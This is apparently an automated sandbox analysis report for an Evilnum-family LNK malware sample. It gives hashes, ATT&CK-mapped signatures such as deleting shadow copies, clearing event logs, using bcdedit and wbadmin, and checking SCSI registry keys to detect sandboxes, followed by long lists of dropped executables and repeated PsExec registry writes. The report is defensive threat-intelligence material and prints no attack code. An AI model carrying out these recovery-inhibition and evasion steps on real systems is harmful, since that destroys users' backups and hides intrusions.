evilnum | 0d878b1b9f5c1ae8925e55df9e10b4271eb99970af133e251830044d24296ba8

Analysis

max time kernel
150s
max time network
151s
platform
windows10_x64
resource
win10v20201028
submitted
26-12-2020 20:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e.lnk
Size

938KB
MD5

cb908352d719b9e0a7142c4110ae502e
SHA1

e50a8c33b315517a4bad5eb35fb09e572c3ee9fa
SHA256

f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e
SHA512

9502d7c069532571277e3c8c849e9ce81130a11bf5ad892dad688aa9e53973abc76fb5b53aee72ca37fe29e50aa2543f2681a6d849ada59b9e07ff6e3b574909

Score

10^/10

evilnum evasion ransomware trojan

Malware Config

Signatures

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
3820	bcdedit.exe
252	bcdedit.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
3568	wbadmin.exe

Executes dropped EXE 155 IoCs

pid	Process
412	vfrkl.exe
3428	_umx.exe
4088	_fif.exe
2600	_fif.exe
3908	_fif.exe
3060	_fif.exe
1856	PSEXESVC.exe
1892	_ple.exe
2672	_fif.exe
3212	_fif.exe
3236	_fif.exe
1516	_fif.exe
2632	_fif.exe
3120	_fif.exe
892	_fif.exe
496	_fif.exe
188	_ple.exe
1860	_fif.exe
1940	_fif.exe
2340	_fif.exe
4196	_fif.exe
4208	_fif.exe
4344	_ple.exe
4332	_fif.exe
4384	_fif.exe
4424	_fif.exe
4536	_fif.exe
4604	_fif.exe
4716	_fif.exe
4728	_fif.exe
4840	_ple.exe
4816	_fif.exe
4828	_fif.exe
4908	_fif.exe
5024	_fif.exe
5072	_fif.exe
5116	_ple.exe
4152	_fif.exe
1888	_fif.exe
2916	_fif.exe
1032	_fif.exe
4300	_fif.exe
4308	_fif.exe
4212	_fif.exe
4056	_fif.exe
4176	_fif.exe
4360	_fif.exe
4440	_fif.exe
4504	_fif.exe
4596	_fif.exe
4680	_fif.exe
4660	_fif.exe
4784	_fif.exe
4760	_fif.exe
4636	_fif.exe
4856	_fif.exe
4820	_fif.exe
4996	_fif.exe
5052	_fif.exe
1196	_fif.exe
5104	_fif.exe
3796	_fif.exe
4320	_fif.exe
4160	_fif.exe
4200	_fif.exe
4260	_fif.exe
1736	_fif.exe
4268	_fif.exe
4164	_fif.exe
4400	_fif.exe
4688	_fif.exe
4532	_fif.exe
4488	_fif.exe
4736	_fif.exe
4812	_fif.exe
3216	_fif.exe
4872	_fif.exe
4964	_fif.exe
4836	_fif.exe
5040	_fif.exe
4264	_fif.exe
5108	_fif.exe
2620	_fif.exe
1044	_fif.exe
4220	_fif.exe
4544	_fif.exe
4592	_fif.exe
4288	_fif.exe
1388	_fif.exe
4580	_fif.exe
3408	_fif.exe
1168	_fif.exe
4708	_fif.exe
4720	_fif.exe
4748	_fif.exe
200	_fif.exe
4744	_fif.exe
4984	_fif.exe
4824	_fif.exe
4808	_fif.exe
5084	_fif.exe
1464	_fif.exe
4900	_fif.exe
4108	_fif.exe
4172	_fif.exe
2704	_fif.exe
3996	_fif.exe
5112	_fif.exe
4664	_fif.exe
4216	_fif.exe
4692	_fif.exe
4780	_fif.exe
4588	_fif.exe
4452	_fif.exe
4648	_fif.exe
4852	_fif.exe
212	_fif.exe
1376	_fif.exe
5012	_fif.exe
2676	_fif.exe
3672	_fif.exe
2164	_fif.exe
4224	_fif.exe
4276	_fif.exe
4296	_fif.exe
4116	_fif.exe
4608	_fif.exe
4628	_fif.exe
4796	_fif.exe
4432	_fif.exe
4672	_fif.exe
4940	_fif.exe
1796	_fif.exe
4696	_fif.exe
4732	_fif.exe
4148	_fif.exe
4960	_fif.exe
2316	_fif.exe
5088	_fif.exe
1580	_fif.exe
4228	_fif.exe
4600	_fif.exe
4156	_fif.exe
4668	_fif.exe
4516	_fif.exe
4348	_fif.exe
3932	_fif.exe
4444	_fif.exe
1192	_fif.exe
4876	_fif.exe
4992	_fif.exe
4860	_fif.exe
904	_fif.exe
4016	_fif.exe
5100	_fif.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File created	C:\Windows\PSEXESVC.exe	_fif.exe
File created	C:\Windows\PSEXESVC.exe	_fif.exe
File opened for modification	C:\Windows\_ple.exe	notepad.exe
File opened for modification	C:\Windows\_ple.exe	notepad.exe
File opened for modification	C:\Windows\_ple.exe	notepad.exe
File opened for modification	C:\Windows\_ple.exe	notepad.exe
File created	C:\Windows\PSEXESVC.exe	_fif.exe
File created	C:\Windows\PSEXESVC.exe	_fif.exe
File opened for modification	C:\Windows\_ple.exe	notepad.exe

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	vds.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
4000	vssadmin.exe

Modifies data under HKEY_USERS 296 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
